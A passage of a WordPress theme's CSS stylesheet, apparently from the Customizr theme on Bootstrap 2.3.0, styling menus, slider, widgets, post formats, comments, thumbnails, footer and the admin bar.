.vertical(@dropdownLinkBackgroundHover, darken(@dropdownLinkBackgroundHover, 5%));*/ } .dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a { background-color: #f2f2f2; background-image: none; color: #e67fb9; text-decoration: none; } .dropdown-submenu > a:after { display: block; content: " "; float: right; width: 0; height: 0; border-color: transparent; border-style: solid; border-width: 4px 0 4px 4px; border-left-color: #cccccc; } .dropdown-submenu:hover > a:after, .dropdown-menu > li.current-menu-item > a:after, .dropdown-menu > li.current-menu-ancestor > a:after { border-left-color: #e67fb9; } /* Offset the responsive button for proper vertical alignment */ .navbar .btn-navbar { margin-top: 7px; } .navbar-inner .tc-nav-button { display: none; } .navbar .btn-navbar:hover, .navbar .btn-navbar:focus, .navbar .btn-navbar:active, .navbar .btn-navbar.active { outline: 0; } /* MENU -------------------------------------------------- */ .dropdown-menu { border: 0px solid rgba(0, 0, 0, 0.2); } .dropdown-submenu > .dropdown-menu { top: 110%; left: 30%; top: 0%\9; /* IE 8 and below */ left: 30%\9; /* IE 8 and below */ margin-top: -6px; margin-left: -1px; -webkit-border-radius: 6px 6px 6px 6px; -moz-border-radius: 6px 6px 6px 6px; border-radius: 6px 6px 6px 6px; } /* ie9 hack */ .ie9 .dropdown-submenu > .dropdown-menu { left: 30%; } /* ie hack */ .dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a { filter: progid:DXImageTransform.Microsoft.gradient(enabled=false); } /* NEW MENU -------------------------------------------------- */ .tc-hover-menu.nav ul { top: 29px; } /* ie hack */ .ie .tc-hover-menu.nav ul { top: 27px; } /* OLD */ /* .tc-hover-menu.nav.nav li:hover > ul { display: block; } */ .tc-hover-menu.nav li:hover > ul { display: block; } /* GENERAL MENU STYLE */ .nav .dropdown-menu { -webkit-box-shadow: 0 2px 8px rgba(0, 0, 0, 0.2); -moz-box-shadow: 0 2px 8px rgba(0, 0, 0, 0.2); box-shadow: 0 2px 8px rgba(0, 0, 0, 0.2); } li.dropdown.active > .dropdown-toggle, .navbar .nav li.dropdown.open.active > .dropdown-toggle, .navbar .nav li.dropdown.open > .dropdown-toggle { background-color: transparent\9; /* IE8 and below */ background-color: rgba(0, 0, 0, 0); } /* REVEAL SUBMENU BLOCK ON CLICK */ .navbar-inner .nav-collapse .nav li.open > ul { display: block; } .navbar.resp { display: block; width: 100%; } /* SUBMENU MOVE EFFECT ON HOVER */ .tc-submenu-move .dropdown-menu > li > a:focus, .tc-submenu-move .dropdown-menu > li > a:hover, .tc-submenu-move .dropdown-submenu:focus > a, .tc-submenu-move .dropdown-submenu:hover > a { padding-left: 1.63em; } /* ADJUST LEFT AND RIGHT MENU POSITIONS => align with socials (left) and tagline (right) */ .navbar div > ul.nav > .menu-item:last-child > a { padding-right: 0px; } .navbar .nav { margin-right: 0px; } .navbar div > ul.nav > .menu-item:first-child > a { padding-left: 5px; } .pull-menu-left .nav-collapse { float: left; } .pull-menu-right .nav-collapse { float: right; } /* BREADCUMB -------------------------------------------------- */ .tc-hot-crumble { margin-top: 5px; position: relative; z-index: 10; } /* SIDEBARS */ #right.widget-area { padding-left: 5px; border-left: 1px solid #eeeeee; position: relative; } #right.widget-area:before { content: ""; height: 100%; border-left: 1px solid #ffffff; position: absolute; left: 0px; top: 0px; } #left.widget-area { padding-right: 5px; border-right: 1px solid #eeeeee; position: relative; } #left.widget-area::after { content: ''; position: absolute; height: 100%; border-right: 1px solid #ffffff; right: -2px; bottom: 0px; } .widget_recent_entries li { border-bottom: 1px solid #eeeeee; position: relative; } .widget_recent_entries li:after { content: ""; border-bottom: 1px solid #ffffff; position: absolute; width: 100%; right: 0px; bottom: -2px; } /* WIDGETS STYLING */ .widget_archive li a, .widget_categories li a, .widget_pages li a, .widget_links li a, .widget_meta li a, .widget_nav_menu li a { font-size: 13px; } .widget li { list-style: none; } .widget.widget_archive li:before, .widget.widget_categories li:before, .widget.widget_calendar li:before, .widget.widget_pages li:before, .widget.widget_links li:before, .widget.widget_meta li:before, .widget.widget_recent_entries li:before, .widget.widget_recent_comments li:before, .widget.widget_nav_menu li:before, .widget.widget_rss li:before { content: '\203A'; position: relative; left: -10px; color: #e67fb9; -webkit-transition: left 0.2s; -moz-transition: left 0.2s; -ms-transition: left 0.2s; -o-transition: left 0.2s; transition: left 0.2s; } .widget li.on:before { left: -7px; } #main-wrapper .widget li { line-height: 25px; border-bottom: 1px solid #EEE; position: relative; } #main-wrapper .widget li:after { content: ""; border-bottom: 1px solid #FFF; position: absolute; width: 100%; right: 0px; bottom: -2px; } #main-wrapper .widget li:hover, .widget li:focus { text-decoration: none; background-color: #EEE; } #main-wrapper .widget li a { text-shadow: 0 1px 0 #FFF; } /* NO WIDGETS ICONS */ .no-widget-icons h3.widget-title::before { content: none!important; } /* SOCIAL -------------------------------------------------- */ .navbar-inner .social-block { padding: 0px 20px 0px 10px; *max-width: 270px; /* IE 7 and below */ margin: 10px 0; } .social-block.widget_social a { font-size: 1em; } .colophon .social-block { margin: 0px; text-align: center; } .social-block a { color: #5A5A5A; font-size: 1.3em; text-shadow: 0 1px 0 #ffffff; opacity: 0.8; display: inline; background: none; width: inherit; height: inherit; vertical-align: inherit; line-height: inherit; margin: 0px; text-decoration: none; padding-right: 13px; position: relative; top: 2px; } footer#footer .colophon .social-block a { color: #5A5A5A; text-shadow: 0 0px 0 #ffffff; font-size: 1.1em; } .social-block a:hover { color: #e67fb9; opacity: 1; } /* SLIDER -------------------------------------------------- */ /* Carousel base class */ .carousel { margin-bottom: 0px; } .carousel .container { position: relative; z-index: 9; width: auto; } .carousel-inner > .active { /* Fix slider in IE */ z-index: 9\9; /*hack IE 8 and below */ } /* SLIDER CONTROLS */ .tc-carousel-control { font-size: 120px; text-shadow: 0 1px 1px rgba(0, 0, 0, 0.4); z-index: 10; color: #999; line-height: 16px; vertical-align: middle; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; display: inline-block; height: 38px; } .tc-carousel-control:focus, .tc-carousel-control:hover { color: #e67fb9; /* DYNAMIC!!!! LESS */ text-decoration: none; opacity: .9; filter: alpha(opacity=90); outline: none; } .tc-slider-controls { position: absolute; bottom: 0; max-height: 500px; /* OVERRIDEN BY DYNAMIC!!!! PHP + JS */ line-height: 500px; /* OVERRIDEN BY DYNAMIC!!!! PHP + JS */ width: 10%; opacity: 0; } .tc-slid-hover .tc-slider-controls { opacity: 1; -webkit-transition: opacity 0.3s ease; -moz-transition: opacity 0.3s ease; -o-transition: opacity 0.3s ease; transition: opacity 0.3s ease; } .tc-slider-controls.right { right: 0; text-align: right; } .tc-slider-controls.left { left: 0; text-align: left; } /*.carousel-control { height: 80px; top:44%; margin-top: 0; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 120px; text-shadow: 0 1px 1px rgba(0, 0, 0, 0.4); background-color: transparent; border: 0; z-index: 10; *line-height: 72px; } */ .carousel .item { line-height: 500px; overflow: hidden; min-height: 500px; } .carousel .item > span { *zoom: 1; /* layout hack IE7 and below */ } .carousel-image { position: absolute; top: 0; left: 0; min-width: 100%; /* height: 500px; */ } .carousel-image img { width: 100%; /* max-height: 100%; */ } .carousel-image.slider-full img { max-width: 100%; } .carousel-caption { background-color: transparent\9; /* IE8 and below */ background: rgba(0, 0, 0, 0.2); filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#33000000', endColorstr='#33000000', GradientType=0); /* IE6-9 */ max-width: 60%; padding: 5%; line-height: 14px; vertical-align: middle; *top: 25%; /*hack IE7 and below */ display: inline-block; position: relative; margin-left: 11%; /*display:inline; IE7 and below */ } .carousel-caption h1, .carousel-caption .lead { margin: 0; line-height: 1.25; color: white; text-shadow: 0 1px 1px rgba(0, 0, 0, 0.4); } .carousel-caption .btn { margin-top: 10px; } .slider.edit-link { position: absolute; bottom: 40px; right: 11%; } /* If automatic centering is enabled */ .carousel > .center-slides-enabled > .item > .carousel-image img { display: block; position: relative; } /* Gif Loader if center slide option is checked */ .tc-slider-loader-wrapper { height: 500px; width: 100%; line-height: 500px; position: absolute; z-index: 1000; text-align: center; background: #FAFAFA; } .tc-img-gif-loader { line-height: 15px; vertical-align: middle; width: 100%; display: inline-block; position: relative; } /* CUSTOM SLIDER HEIGHT */ .custom-slider-height .carousel-inner .item { /*min-height:inherit;*/ } /* FEATURED PAGES -------------------------------------------------- */ /* Center align the text within the three columns below the carousel */ .marketing { margin-top: 20px; } .marketing .span4 { text-align: center; } .marketing h2 { font-weight: normal; } .marketing .span4 p { margin-left: 10px; margin-right: 10px; } /*hover effect*/ .thumb-wrapper { width: 269px; max-width: 100%; height: 250px; position: relative; left: -1px; top: 0px; display: block; overflow: hidden; text-align: center; margin: auto; } .span9.article-container .thumb-wrapper { left: 1px; } .thumb-wrapper img { z-index: 90; } .thumb-wrapper.no-effect img { min-height: initial; } .thumb-wrapper.tc-holder { display: none\9; /* IE 8 and below */ } .round-div { display: block; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease; position: absolute; width: 170px; height: 170px; z-index: 99; -webkit-border-radius: 60px; -moz-border-radius: 500px; border-radius: 900px; border: 104px solid #fafafa; border-image: none; top: -66px; left: -54px; } /* two sidebars case */ .span6.article-container .round-div { width: 115px; height: 115px; top: -76px; left: -76px; } .span6.article-container .thumb-wrapper { height: 180px; } .round-div.no-effect { border: none; } #footer .round-div { border-color: #5a5a5a; } .no-cssanimations .round-div { border: 0px; } .no-cssanimations .thumb-wrapper { opacity: 0.7; } .no-cssanimations .thumb-wrapper:hover { opacity: 1; } .widget-front.hover .round-div, article.hover .round-div { -webkit-transform: scale(1.4); -moz-transform: scale(1.4); -ms-transform: scale(1.4); -o-transform: scale(1.4); transform: scale(1.4); } .widget-front { text-align: center; } /* Featurettes ------------------------- */ .featurette-divider { margin: 30px 0; clear: both; /* Space out the Bootstrap <hr> more */ } .featurette { padding-top: 120px; /* Vertically center images part 1: add padding above and below text. */ overflow: hidden; /* Vertically center images part 2: clear their floats. */ } .featurette-image { margin-top: -120px; /* Vertically center images part 3: negative margin up the image the same amount of the padding to center it. */ } /* Give some space on the sides of the floated elements so text doesn't run right into it. */ .featurette-image.pull-left { margin-right: 40px; } .featurette-image.pull-right { margin-left: 40px; } /* Thin out the marketing headings */ .featurette-heading { font-size: 50px; font-weight: 300; line-height: 1; letter-spacing: -1px; } /* POST STUFF -------------------------------------------------- */ #main-wrapper { margin-top: 20px; margin-bottom: 20px; } .entry-summary { text-align: justify; } /*title */ .post h1, .post h2 { display: inline-block; } h1.entry-title, h2.entry-title { width: 100%; } h1 a:hover, h2 a:hover { text-decoration: none; } .entry-meta { font-style: italic; font-size: 12px; margin-bottom: 8px; } .entry-meta .btn { margin: 1px 1px; } .entry-meta .btn-tag { color: #FFF; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #808080; background-image: -moz-linear-gradient(top, #8f8f8f, #696969); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#8f8f8f), to(#696969)); background-image: -webkit-linear-gradient(top, #8f8f8f, #696969); background-image: -o-linear-gradient(top, #8f8f8f, #696969); background-image: linear-gradient(to bottom, #8f8f8f, #696969); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff8f8f8f', endColorstr='#ff696969', GradientType=0); border-color: dimgray dimgray #424242; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); filter: progid:DXImageTransform.Microsoft.gradient(enabled=false); } .entry-meta .btn-tag:hover { color: #FFF; background-color: dimgray; } .edit-link a { color: white; } article .tc-content { margin-bottom: 30px; } /*Post Format Specifics*/ article.format-aside .entry-content { padding: 24px 24px 0; padding: 1.714285714rem; background: #d2e0f9; border-left: 18px solid #a8bfe8; } article.format-chat .entry-content { padding: 24px 24px 0; padding: 1.714285714rem; background: #c9c9c9; border-left: 18px solid #afafaf; } article.format-quote .entry-content, article.error404 .entry-content { padding: 24px 24px 0; padding: 1.714285714rem; background: #c9c9c9; border-left: 18px solid #afafaf; } article.format-quote .entry-content blockquote, article.error404 .entry-content blockquote { border: 0px; background: inherit; } cite { font-style: normal; font-size: 14px; } blockquote { padding: 5px 0 5px 15px; margin: 0 0 20px; font-style: italic; background: #FFF; } article.format-link .entry-content { padding: 24px 24px 0; padding: 1.714285714rem; background: #f7cfac; border-left: 18px solid #e07211; } article.format-link .entry-content a { color: #e07211; font-size: 20px; text-decoration: none; } article.format-link .entry-content a:after { speak: none; font-weight: normal; font-variant: normal; text-transform: none; line-height: 0px; -webkit-font-smoothing: antialiased; padding-left: 6px; font-size: 1.5em; opacity: 0.3; position: relative; content: "\00bb"; top: 6px; } article.format-status .entry-content { padding: 24px 24px 0; padding: 1.714285714rem; background: #a3eda3; border-left: 18px solid #62c462; } article.format-gallery p.format-icon, article.format-image p.format-icon { text-align: center; font-size: 6em; } .entry-content.format-icon p { text-shadow: 0px 1px 0px #FFF; color: #000000; } article .author-info, .archive-header .author-info { background: #FFF; padding: 15px; box-shadow: 0 0 5px rgba(0, 0, 0, 0.2); font-style: italic; font-size: inherit; } article .author-info h2, .archive-header .author-info h2 { margin: 0px; } /* pagination */ .page-links button.btn { color: #e67fb9; font-weight: bold; } .page-links a button.btn { color: #5a5a5a; font-weight: normal; } /* Comments */ #respond #comment { width: 100%; } .comments-link { display: inline-block; height: 36px; line-height: 36px; position: relative; bottom: 10px; } .comments-link .fs1 { font-size: 40px; line-height: initial; vertical-align: inherit; margin: 0px; display: inline; background: none; height: inherit; /*float: left;*/ z-index: 1; width: 34px; opacity: 0.8; } .comments-link .tc-comment-bubble { color: #ff0000; } .tc-skin-bubble-comment-color .comments-link .tc-comment-bubble { color: #e67fb9; } /* custom bubble */ .comments-link .custom-bubble-one { color: #ff0000; border: 2px solid #ff0000; } .comments-link .custom-bubble-one:before { border-color: #ff0000 rgba(0, 0, 0, 0); } .tc-skin-bubble-comment-color .custom-bubble-one { color: #e67fb9; border: 2px solid #e67fb9; } .tc-skin-bubble-comment-color .custom-bubble-one:before { border-color: #e67fb9 rgba(0, 0, 0, 0); } .comments-link .inner { color: white; display: inline-block; font-size: 11px; font-weight: bold; height: 51px; line-height: 30px; position: relative; left: -35px; text-align: center; text-shadow: 0 1px 0 #141313; vertical-align: middle; width: 30px; z-index: 10; } .rtl .comments-link .inner { right: -35px; left: initial; } .comments-link a:hover { text-decoration: none; } input[type="submit"] { display: inline-block; padding: 4px 12px; margin-bottom: 0; font-size: 14px; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; line-height: 20px; color: #333; text-align: center; text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75); vertical-align: middle; cursor: pointer; border: 1px solid #CCC; border-color: #E6E6E6 #E6E6E6 #BFBFBF; border-bottom-color: #B3B3B3; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05); -moz-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05); box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05); color: white; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #363636; background-image: -moz-linear-gradient(top, #444444, #222222); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#444444), to(#222222)); background-image: -webkit-linear-gradient(top, #444444, #222222); background-image: -o-linear-gradient(top, #444444, #222222); background-image: linear-gradient(to bottom, #444444, #222222); background-repeat: repeat-x; border-color: #222 #222 black; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff444444', endColorstr='#ff222222', GradientType=0); filter: progid:DXImageTransform.Microsoft.gradient(enabled=false); } input[type="submit"]:hover { color: white; background-color: #222; text-decoration: none; background-position: 0 -15px; -webkit-transition: background-position 0.1s linear; -moz-transition: background-position 0.1s linear; -o-transition: background-position 0.1s linear; transition: background-position 0.1s linear; } /* CODE FOR COMMENTS */ code { white-space: normal; } /* POST NAVIGATION*/ h3.assistive-text { text-align: center; letter-spacing: 4px; color: #f3bfdc; opacity: 0.5; margin: 0px; } .navigation .pager { margin: 0px; } /* Style embedded objects */ embed, iframe, object, video { max-width: 100%; } .hide-post-metas .entry-header .entry-meta { display: none; } /* POST THUMBNAILS -------------------------------------------------- */ .tc-rectangular-thumb { max-height: 250px; display: block; overflow: hidden; } .tc-rectangular-thumb img { position: relative; webkit-transition: -webkit-filter 0.4s ease; -moz-transition: -moz-filter 0.4s ease; -o-transition: -o-filter 0.4s ease; transition: -webkit-filter 0.4s ease; width: 100%; } .rectangular-blurred .tc-thumbnail img:hover { -webkit-filter: blur(2px); -moz-filter: blur(2px); -o-filter: blur(2px); -ms-filter: blur(2px); filter: blur(2px); } .no-csstransitions .rectangular-blurred .tc-thumbnail img:hover { opacity: 0.7; } .rectangular-unblurred .tc-thumbnail img { -webkit-filter: blur(2px); -moz-filter: blur(2px); -o-filter: blur(2px); -ms-filter: blur(2px); filter: blur(4px); } .rectangular-unblurred .tc-thumbnail img:hover { -webkit-filter: blur(0px); -moz-filter: blur(0px); -o-filter: blur(0px); -ms-filter: blur(0px); filter: blur(0px); } .no-csstransitions .rectangular-unblurred .tc-thumbnail img { opacity: 0.7; } .no-csstransitions .rectangular-unblurred .tc-thumbnail img:hover { opacity: 1; } .rounded-expanded .thumb-wrapper .round-div { -webkit-transform: scale(1.4); -moz-transform: scale(1.4); -ms-transform: scale(1.4); -o-transform: scale(1.4); transform: scale(1.4); } .squared .round-div { -webkit-border-radius: 0px; -moz-border-radius: 0px; border-radius: 0px; } .squared-expanded .thumb-wrapper .round-div { -webkit-transform: scale(1.4); -moz-transform: scale(1.4); -ms-transform: scale(1.4); -o-transform: scale(1.4); transform: scale(1.4); -webkit-border-radius: 0px; -moz-border-radius: 0px; border-radius: 0px; } .__before_main_wrapper > .tc-thumbnail.span12 img { width: 100%; } .__before_content > .tc-thumbnail.span12 img { margin-top: 10px; } /* NO EFFECT ON SINGLE */ .single .rectangular-unblurred img, .single .rectangular-blurred img { -webkit-filter: blur(0px); -moz-filter: blur(0px); -o-filter: blur(0px); -ms-filter: blur(0px); filter: blur(0px); opacity: 1!important; width: 100%; } /* WP CSS -------------------------------------------------- */ .wp-caption { max-width: 100%; /* Keep wide captions from overflowing their container. */ padding: 4px; } .wp-caption .wp-caption-text, .gallery-caption, .entry-caption { font-style: italic; font-size: 12px; font-size: 0.7rem; line-height: 1.3em; color: #757575; } .gallery-item img { box-shadow: 0 0 5px rgba(0, 0, 0, 0.2); -moz-transition: -moz-transform 3s ease; -webkit-transition: -webkit-transform 3s ease; -o-transition: -o-transform 3s ease; transition: transform 3s ease; } .gallery-icon img:hover { -moz-transform: scale(1.08); -webkit-transform: scale(1.08); -o-transform: scale(1.08); transform: scale(1.08); -ms-transform: scale(1.08); -moz-box-shadow: 0px 0px 10px 0px #9b9b9b; -webkit-box-shadow: 0px 0px 10px 0px #9B9B9B; -o-box-shadow: 0px 0px 10px 0px #9b9b9b; box-shadow: 0px 0px 10px 0px #9B9B9B; filter: progid:DXImageTransform.Microsoft.Shadow(color=#9b9b9b, Direction=NaN, Strength=20); } /* single attachment images are displayed with a fade in effect (see tc script for js) */ article.attachment img { opacity: 0; } .attachment #image-navigation .next-image { float: right; } .entry-attachment .attachment { text-align: center; } article.sticky { color: #5a5a5a; font-weight: bold; text-align: center; } article.sticky h2 { font-size: 40px; line-height: 45px; } li.bypostauthor cite span { padding: 6px 10px; padding: 0.428571429rem 0.714285714rem; font-size: 11px; font-size: 0.785714286rem; line-height: 1.428571429; font-weight: normal; color: #7c7c7c; background-color: #e6e6e6; background-repeat: repeat-x; background-image: -moz-linear-gradient(top, #f4f4f4, #e6e6e6); background-image: -ms-linear-gradient(top, #f4f4f4, #e6e6e6); background-image: -webkit-linear-gradient(top, #f4f4f4, #e6e6e6); background-image: -o-linear-gradient(top, #f4f4f4, #e6e6e6); background-image: linear-gradient(top, #f4f4f4, #e6e6e6); border: 1px solid #d2d2d2; border-radius: 3px; box-shadow: 0 1px 2px rgba(64, 64, 64, 0.1); } li.bypostauthor cite span { color: white; background-color: #21759b; background-image: none; border: 1px solid #1f6f93; border-radius: 2px; box-shadow: none; padding: 0; } ul.children { margin: 10px 0px 10px 40px; padding: 0px; } .commentlist { margin: 0px; padding: 0px; } .comment article, .trackback article, .pingback article { background: white; padding: 15px; box-shadow: 0 0 5px rgba(0, 0, 0, 0.2); } .commentlist > .comment, .commentlist > .trackback, .commentlist > .pingback, .CommentForm > .comment, .comment ul > .comment { list-style: none; position: relative; margin: 0 0 20px 0; font-size: 14px; } .reply { float: right; margin-right: 10px; } .comment cite { font-size: 23px; line-height: 26px; display: block; } .comment .edit-link { display: block; float: right; margin-right: 10px; } .comment-avatar { margin-bottom: 5px; } .comment-meta a.comment-date { font-style: italic; font-size: 12px; } .comments-area li.bypostauthor cite span { margin-left: 5px; margin-left: 0.357142857rem; padding: 2px 5px; padding: 0.142857143rem 0.357142857rem; font-size: 10px; font-size: 0.714285714rem; } /* Images */ .alignleft { float: left; } .alignright { float: right; } .aligncenter { display: block; margin-left: auto; margin-right: auto; } img.alignleft { margin: 12px 24px 12px 0; margin: 0.857142857rem 1.714285714rem 0.857142857rem 0; } img.alignright { margin: 12px 0 12px 24px; margin: 0.857142857rem 0 0.857142857rem 1.714285714rem; } img.aligncenter { margin-top: 12px; margin-top: 0.857142857rem; margin-bottom: 12px; margin-bottom: 0.857142857rem; } /* OTHER CUSTOMIZED WP CSS */ #calendar_wrap table { width: 100%; border-color: #e1e1e1; padding: 0; margin: 0 0 20px 0; font-size: inherit; border-top-style: solid; border-top-width: 1px; border-collapse: collapse; border-spacing: 0; } #footer #calendar_wrap table { color: #5a5a5a; } #footer #calendar_wrap table caption { color: #EEE; } #footer #calendar_wrap table a { color: #e67fb9; } table caption { padding: 0 0 5px 0; width: auto; text-transform: uppercase; font-size: 16px; text-align: center; } #wp-calendar tr, #wp-calendar th, #wp-calendar td { border-color: #e1e1e1; } #wp-calendar td, #wp-calendar th { text-align: center; font-size: inherit; padding: 3px; } #wp-calendar th { background-color: #da3f96; color: white; } tr:nth-child(odd) td, tr:nth-child(odd) th { background-color: #f8f8f8; } tr:nth-child(even) td, tr:nth-child(even) th { background-color: white; } /*tr th:first-child, tr td:first-child { border-left-style: solid; border-left-width: 1px; }*/ #wp-calendar tfoot td { text-align: left; } ul { /*list-style: none outside;*/ } /* FOOTER -------------------------------------------------- */ footer#footer { color: #fafafa !important; border-top: 10px solid #e9eaee; background: #5a5a5a; padding: 0px; } .footer-widgets { padding: 20px 0px 20px; } footer#footer p, footer#footer a { font-size: 11px; line-height: 21px; color: #fafafa; margin-bottom: 2px; text-align: center; } footer#footer h3, footer#footer h4, footer#footer h5, footer#footer h6 { font-size: 22px; line-height: 26px; color: #fafafa; text-align: center; text-shadow: 0px 0px 0px #FFF; } footer#footer .colophon { margin-top: 0px; background-color: #ffffff; padding: 10px 20px; } footer#footer .colophon a, footer#footer .colophon p { color: #5a5a5a; } footer#footer .colophon a.back-to-top { color: #e67fb9; } footer .widget_recent_entries li:after { border-bottom: none; } footer ul, footer ol { margin: 0 0 10px 0px; } /* SCROLL BACK TO TOP */ .tc-btt-wrapper.show { visibility: visible; cursor: pointer; opacity: 1.0; } .tc-btt-wrapper:hover { background: #777777 transparent; background: rgba(119, 119, 119, 0.5); } .tc-btt-wrapper { position: fixed; opacity: 0; visibility: hidden; overflow: hidden; text-align: center; z-index: 99999999; background: #777777 transparent; background: rgba(119, 119, 119, 0.2); color: #EEE; width: 45px; height: 43px; line-height: 43px; right: 30px; bottom: 25px; padding-top: 2px; border-top-left-radius: 10px; border-top-right-radius: 10px; border-bottom-right-radius: 10px; border-bottom-left-radius: 10px; -webkit-transition: all 0.2s ease-in-out; -moz-transition: all 0.2s ease-in-out; -ms-transition: all 0.2s ease-in-out; -o-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; } .tc-btt-wrapper i.btt-arrow { line-height: inherit; } .btt-arrow { display: inline-block; font-family: 'genericons'; font-size: 2em; font-style: normal; font-weight: normal; line-height: 1; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .btt-arrow:before { content: "\f432"; text-shadow: 0px 1px 0 #FFF; } /* ADMIN BAR -------------------------------------------------- */ #wpadminbar #wp-admin-bar-tc-customizr-help .ab-item:before, li#wp-admin-bar-tc-customizr-help a:before { font-family: 'entypo'; content: "\E788"; color: #FFF; speak: none; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; -webkit-font-smoothing: antialiased; padding-right: 0px; top: 5px; font-size: 30px; position: relative; line-height: 0px; } #wpadminbar #wp-admin-bar-tc-customizr .ab-item:before, li#wp-admin-bar-tc-customizr a:before { font-family: 'entypo'; content: "\E79A"; color: #FFF; speak: none; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; -webkit-font-smoothing: antialiased; padding-right: 0px; top: 4px; font-size: 30px; position: relative; line-height: 0px; } li#wp-admin-bar-tc-customizr-help a { color: #FFF; text-decoration: none; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #8DA65A; background-image: -moz-linear-gradient(top, #27cda5, #1b8d71); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#27cda5), to(#1b8d71)); background-image: -webkit-linear-gradient(top, #27cda5, #1b8d71); background-image: -o-linear-gradient(top, #27cda5, #1b8d71); background-image: linear-gradient(to bottom, #27cda5, #1b8d71); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff9db668', endColorstr='#ff768d44', GradientType=0); border-color: #1B8D71 #1B8D71 #4B5A2B; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); filter: progid:DXImageTransform.Microsoft.gradient(enabled=false); } #wpadminbar .ab-top-menu > li#wp-admin-bar-tc-customizr-help:hover > .ab-item { color: #FFF; background: #1B8D71; /* Old browsers */ background: -moz-linear-gradient(top, #1b8d71 1%, #27cda5 100%, #27cda5 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(1%, #1b8d71), color-stop(100%, #27cda5), color-stop(100%, #27cda5)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #1b8d71 1%, #27cda5 100%, #27cda5 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #1b8d71 1%, #27cda5 100%, #27cda5 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #1b8d71 1%, #27cda5 100%, #27cda5 100%); /* IE10+ */ background: linear-gradient(to bottom, #1b8d71 1%, #27cda5 100%, #27cda5 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#1B8D71', endColorstr='#27CDA5', GradientType=0); /* IE6-9 */ } li#wp-admin-bar-tc-customizr a { background-color: #21759B; background-image: -webkit-gradient(linear, left top, left bottom, from(#2a95c5), to(#21759b)); background-image: -webkit-linear-gradient(top, #2a95c5, #21759b); background-image: -moz-linear-gradient(top, #2a95c5, #21759b); background-image: -ms-linear-gradient(top, #2a95c5, #21759b); background-image: -o-linear-gradient(top, #2a95c5, #21759b); background-image: linear-gradient(to bottom, #2a95c5, #21759b); border-color: #21759B; border-bottom-color: #1E6A8D; -webkit-box-shadow: inset 0 1px 0 rgba(120, 200, 230, 0.5); box-shadow: inset 0 1px 0 rgba(120, 200, 230, 0.5); color: #FFF; text-decoration: none; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); } #wpadminbar .ab-top-menu > li#wp-admin-bar-tc-customizr:hover > .ab-item { background: #21759b; /* Old browsers */ background: -moz-linear-gradient(top, #21759b 0%, #2e9fd2 100%, #27cda5 100%, #2e9fd2 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #21759b), color-stop(100%, #2e9fd2), color-stop(100%, #27cda5), color-stop(100%, #2e9fd2)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #21759b 0%, #2e9fd2 100%, #27cda5 100%, #2e9fd2 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #21759b 0%, #2e9fd2 100%, #27cda5 100%, #2e9fd2 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #21759b 0%, #2e9fd2 100%, #27cda5 100%, #2e9fd2 100%); /* IE10+ */ background: linear-gradient(to bottom, #21759b 0%, #2e9fd2 100%, #27cda5 100%, #2e9fd2 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#21759b', endColorstr='#2e9fd2', GradientType=0); /* IE6-9 */ border-color: #1B607F; -webkit-box-shadow: inset 0 1px 0 rgba(120, 200, 230, 0.6); box-shadow: inset 0 1px 0 rgba(120, 200, 230, 0.6); color: #FFF; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.3); } /* MEDIA PRINT -------------------------------------------------- */ /* Remove links on print (twitter bootstrap displays them) */ @media print { a[href]:after { content: ""; } abbr[title]:after { content: ""; } @page { margin: 1cm; } } /********************************************************************************* ************************** Responsive T. Bootstrap Grid ************************** **********************************************************************************/ /*! * Bootstrap Responsive v2.3.0 * * Copyright 2012 Twitter, Inc * Licensed under the Apache License v2.0 * http://www.apache.org/licenses/LICENSE-2.0 * * Designed and built with all the love in the world @twitter by @mdo and @fat. */ @-ms-viewport { width: device-width; } .hidden { display: none; visibility: hidden; } 